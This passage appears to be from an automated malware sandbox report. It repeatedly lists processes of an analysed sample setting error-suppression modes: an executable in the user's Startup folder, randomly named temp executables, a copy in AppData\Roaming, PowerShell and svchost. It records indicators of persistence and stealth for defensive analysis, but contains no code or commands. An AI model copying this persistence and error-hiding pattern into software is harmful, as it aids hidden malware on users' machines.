                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeProcess information set: NOOPENFILEERRORBOX
